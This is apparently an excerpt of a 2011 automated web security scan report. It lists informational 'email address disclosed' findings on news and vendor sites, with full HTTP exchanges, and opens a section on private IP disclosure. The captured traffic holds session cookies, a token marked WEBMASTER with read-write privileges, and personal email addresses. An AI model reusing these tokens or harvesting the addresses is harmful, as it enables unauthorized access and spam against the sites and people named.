<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoc
...[SNIP]...
<a href="mailto:newsmanager@foxnews.com">
...[SNIP]...
13.31. http://www.foxnews.com/static/all/css/screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxnews.com
Path:   /static/all/css/screen.css

Issue detail

The following email address was disclosed in the response:

Request

GET /static/all/css/screen.css?b20110406 HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: surround=undefined; rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540668835%3B%20omtr_lv%3D1302538868837%7C1397146868837%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540668837%3B%20s_nr%3D1302538868843%7C1305130868843%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dfnc%253Aroot%253Aroot%253Achannel%255E%255EPolitics%255E%255Efnc%253Aroot%253Aroot%253Achannel%2520%257C%2520Politics%255E%255E%3B%20s_sq%3Dfoxnews%253D%252526pid%25253Dfnc%2525253Aroot%2525253Aroot%2525253Achannel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.foxnews.com/politics/index.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 06 Apr 2011 20:14:57 GMT
ETag: "3c2401a-2c6a-a5853240"
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 24h
Content-Type: text/css
Cache-Control: max-age=19321
Expires: Mon, 11 Apr 2011 21:43:13 GMT
Date: Mon, 11 Apr 2011 16:21:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 11370

/* -----------------------------------------------------------------------
BlueTripCSS Framework
Mike Crittenden
mike@capsizedesigns.com
Copyright 2008 Mike Crittenden
License - MIT or GPL (whichever suits you better)
----------------------------------------------------------------------- */
/* Redraw Fix */
.content-container:af
...[SNIP]...
13.32. http://www.foxnews.com/static/all/js/jquery.plugins.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxnews.com
Path:   /static/all/js/jquery.plugins.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/all/js/jquery.plugins.js?1302538751 HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 06 Apr 2011 20:15:05 GMT
ETag: "3d2c00a-1df92-a5ff4440"
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 24h
Content-Type: application/x-javascript
Cache-Control: max-age=19211
Expires: Mon, 11 Apr 2011 21:41:16 GMT
Date: Mon, 11 Apr 2011 16:21:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 122770

// jQuery Plugins And Extensions. Updated: 09/15/2010

(function($){

/***** jQuery Extensions *****//*
Custom / Opensource extensions
******************************/

// Provides a custom context wh
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
13.33. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/ServiceLogin?service=websiteoptimizer&hl=en&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_medium=et&utm_source=us-en-et-bizsol-0-biz1-all&utm_campaign=en HTTP/1.1
Host: www.google.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Set-Cookie: GoogleAccountsLocale_session=en; Secure
Set-Cookie: GALX=QoTBtadx6jU;Path=/accounts;Secure
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=service%3Dwebsiteoptimizer%26continue%3Dhttps%253A%252F%252Fwww.google.com%252Fanalytics%252Fsiteopt%252F%253Fet%253Dreset%2526hl%253Den
Date: Sat, 09 Apr 2011 00:17:14 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 43949

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr">
<style type="text/css"><!--
body,td,div,p,a,font,span {font-family:
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...
13.34. http://www.ingeniux.com/resources/solutions-articles/mobile-content-deployment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ingeniux.com
Path:   /resources/solutions-articles/mobile-content-deployment

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/solutions-articles/mobile-content-deployment HTTP/1.1
Host: www.ingeniux.com
Proxy-Connection: keep-alive
Referer: http://www.ingeniux.com/solutions/website_optimization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LOOPFUSE=ebd94f8a-082f-4397-b307-6476c23d9589; __utmz=42806781.1302308290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42806781.695398080.1302308290.1302308290.1302308290.1; __utmc=42806781; __utmb=42806781.1.10.1302308290

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 00:22:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

...[SNIP]...
<a href="mailto:info@ingeniux.com">info@ingeniux.com</a>
...[SNIP]...
13.35. http://www.ingeniux.com/solutions/website_optimization  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ingeniux.com
Path:   /solutions/website_optimization

Issue detail

The following email addresses were disclosed in the response:

Request

GET /solutions/website_optimization HTTP/1.1
Host: www.ingeniux.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 00:17:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

...[SNIP]...
<a href="mailto:support@ingeniux.com">support@ingeniux.com</a>
...[SNIP]...
<a href="mailto:sales@ingeniux.com">sales@ingeniux.com</a>
...[SNIP]...
13.36. http://www.internetrix.net/js/script.aculo.us/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /js/script.aculo.us/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/script.aculo.us/dragdrop.js HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:17 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 20 Nov 2007 00:47:32 GMT
Accept-Ranges: bytes
Content-Length: 29617
Connection: close
Content-Type: application/x-javascript

// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// See scriptaculous.js for full license.

/*--------------------------------------------------------------------------*/

var Droppables = {
drops: [],

remove: function(element) {
this.
...[SNIP]...
13.37. http://www.internetrix.net/js/script.aculo.us/glider.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /js/script.aculo.us/glider.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/script.aculo.us/glider.js HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:14 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 May 2009 03:34:58 GMT
Accept-Ranges: bytes
Content-Length: 4242
Connection: close
Content-Type: application/x-javascript

// JavaScript Document
/**
* @author Bruno Bornsztein <bruno@missingmethod.com>
* @copyright 2007 Curbly LLC
* @package Glider
* @license MIT
* @url http://www.missingmethod.com/projects/gl
...[SNIP]...
13.38. http://www.internetrix.net/page/articles/latest-news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/articles/latest-news/

Issue detail

The following email address was disclosed in the response:

Request

GET /page/articles/latest-news/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/articles/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.8.10.1302308294; fontsize=100

Response

HTTP/1.1 200
Date: Sat, 09 Apr 2011 00:23:50 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Co
...[SNIP]...
<a href="mailto:dane.hamilton@internetrix.com.au" alt="" title="" rel="" >
...[SNIP]...
<a href="mailto:dane.hamilton@internetrix.com.au" alt="" title="" rel="" >
...[SNIP]...
<a href="mailto:dane.hamilton@internetrix.com.au" alt="" title="" rel="" >
...[SNIP]...
13.39. http://www.marqui.com/company/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marqui.com
Path:   /company/contact-us/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /company/contact-us/ HTTP/1.1
Host: www.marqui.com
Proxy-Connection: keep-alive
Referer: http://www.marqui.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hwhwdtmo2gobqyfa1xxqnu45; LBWEB0102=4090937773.1.3687065408.2276017286

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:21:56 GMT
Server: Microsoft-IIS/6.0
ServerName: Web01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page updated by Marqui on: 12/17/2010 2:22:36 PM marqui2010 p133s1 6.6
...[SNIP]...
<br>
Email: sales@marqui.com<br>
...[SNIP]...
<br>
Email: support@marqui.com<br>
...[SNIP]...
<br>
Email: info@marqui.com<br>
...[SNIP]...
13.40. http://www.vermontopia.com/scripts/jquery/jcrop/js/jquery.Jcrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vermontopia.com
Path:   /scripts/jquery/jcrop/js/jquery.Jcrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery/jcrop/js/jquery.Jcrop.js HTTP/1.1
Host: www.vermontopia.com
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a86813bdf156af37a69a3bdc7834aea8

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:28:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 02 Aug 2010 16:07:49 GMT
ETag: "2da99c4-69f4-48cd966e63f40"
Accept-Ranges: bytes
Content-Length: 27124
Content-Type: application/javascript

/**
* jquery.Jcrop.js v0.9.8
* jQuery Image Cropping Plugin
* @author Kelly Hallman <khallman@gmail.com>
* Copyright (c) 2008-2009 Kelly Hallman - released under MIT License {{{
*
* Permi
...[SNIP]...
13.41. http://www.vermontopia.com/scripts/jquery/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vermontopia.com
Path:   /scripts/jquery/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery/jquery.cookie.js HTTP/1.1
Host: www.vermontopia.com
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a86813bdf156af37a69a3bdc7834aea8

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:28:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 02 Aug 2010 16:07:49 GMT
ETag: "2da9a9b-10f5-48cd966e63f40"
Accept-Ranges: bytes
Content-Length: 4341
Content-Type: application/javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
13.42. http://www.wcax.com/Global/story.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/story.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /Global/story.asp?S=14408244 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352451310:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS12
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: MEMORY
Content-Type: text/html; charset=utf-8
ntCoent-Length: 35416
Cache-Control: private, max-age=290
Expires: Sat, 09 Apr 2011 12:39:12 GMT
Date: Sat, 09 Apr 2011 12:34:22 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 35416

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Police: RI
...[SNIP]...
<a href="mailto:news@wcax.com" target="_blank">
...[SNIP]...
13.43. http://www.wcax.com/build.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /build.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /build.asp?buildtype=buildpagexmlrequest&featureType=C&featureid=63459&affiliateno=183&clientgroupid=1&rnd=552930 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/video/flash/widgets/WNGallery.swf?ver=201010090400
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352164716:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS53
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: MEMORY
Content-Type: text/xml; charset=utf-8
Cache-Control: private, max-age=66
Date: Sat, 09 Apr 2011 12:29:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 635654

<?xml version="1.0" encoding="utf-8"?><DEFAULT><CURRENT><TYPE>C</TYPE><ID>63459</ID><STATUS>L</STATUS><owner><affiliateno>183</affiliateno><affiliatename>WCAX</affiliatename><baseurl>www.wcax.com</bas
...[SNIP]...
<email>worldnownotification@gmail.com</email>
...[SNIP]...
<email>worldnownotification@gmail.com</email>
...[SNIP]...
13.44. http://www.wptz.com/esi/postcaching/getKAtoken.esi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wptz.com
Path:   /esi/postcaching/getKAtoken.esi

Issue detail

The following email address was disclosed in the response:

Request

GET /esi/postcaching/getKAtoken.esi?callletters=wptz&asValue=62976 HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; __utmz=174914276.1302352179.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2064108896-1302352190176; AxData=; Axxd=1; _chartbeat2=2j1fe3rlajhbg39j; __utmv=; __utma=174914276.1441694128.1302352179.1302352179.1302352179.1; __utmc=174914276; __utmb=174914276.12.10.1302352179

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 247
Content-Type: text/html
X-IBS-CCDS-VERSION: 2.16.16
ETag: "43939fc-583-48e06a630b300"
X-IBS-CCDS-ORIGIN: origin132
Cache-Control: max-age=1450
Expires: Sat, 09 Apr 2011 12:54:51 GMT
Date: Sat, 09 Apr 2011 12:30:41 GMT
Connection: close


                               IBSYS.hrst.commentCount.onKAToken({"TOKEN":"0SD0svP/Zk58tfSWXNJ/thuqOKP802x3","METHOD":"POST","PRIVILEGES":"RW","payload_type":"json","role":"WEBMASTER","userId":4054486,"email":"ulocal@wptz.com","username":"wptz"})
13.45. http://www.wptz.com/javascript/script.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wptz.com
Path:   /javascript/script.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript/script.js HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/javascript
X-IBS-CCDS-VERSION: 2.16.16
Vary: Accept-Encoding
X-IBS-CCDS-ORIGIN: origin128
X-Flow: xslt-in-production
Cache-Control: max-age=11235
Expires: Sat, 09 Apr 2011 15:36:58 GMT
Date: Sat, 09 Apr 2011 12:29:43 GMT
Connection: close
Content-Length: 45759


/* WPTZ.com scripts */
// Begin national js scripts
/**
* Copyright 2006, Internet Broadcasting.
* All Rights Reserved.
*
* Namespace management. Usage is: using("com.foo.bar") = { ... }
*
* Au
...[SNIP]...
uc":"WPTZ"},
"statecode":{
"uc":"NY",
"lc":"ny"},
"statename":{
"uc":"NEW YORK",
"lc":"new york",
"mx":"New York"},
"city":{
"uc":"PLATTSBURGH",
"lc":"plattsburgh",
"mx":"Plattsburgh"},
"surveyemail":"planews@wptz.com",
"contentrights":{
"cnn":"yes",
"nbcoo":"no",
"group":"blue",
"blue":"yes"},
"source_names":{
"source":{
"poolid":"1782",
"name":"CNN",
"display":"true"}},
"autorelated":{
"status":"inactive",
"label
...[SNIP]...
13.46. http://www.wptz.com/news/27483035/detail.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wptz.com
Path:   /news/27483035/detail.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/27483035/detail.html HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; __utmz=174914276.1302352179.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2064108896-1302352190176; __utmv=; __utma=174914276.1441694128.1302352179.1302352179.1302352179.1; __utmc=174914276; __utmb=174914276.8.10.1302352179; AxData=; Axxd=1; _chartbeat2=2j1fe3rlajhbg39j

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
X-IBS-CCDS-VERSION: 2.16.16
Vary: Accept-Encoding
X-IBS-CCDS-ORIGIN: origin122
X-Flow: xslt-in-production
Cache-Control: max-age=255
Expires: Sat, 09 Apr 2011 12:34:54 GMT
Date: Sat, 09 Apr 2011 12:30:39 GMT
Connection: close
Content-Length: 71577

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta name="author" content="By Jill Glavan Reporter jglavan@hearst.com">
...[SNIP]...
<a href="MAILTO:jglavan@hearst.com">jglavan@hearst.com</a>
...[SNIP]...
<a href="mailto:planews@ibsys.com">
...[SNIP]...
14. Private IP addresses disclosed  previous  next
There are 174 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

14.1. http://kellwood.com/_images/aboutPage.jpg  previous  next

Summary

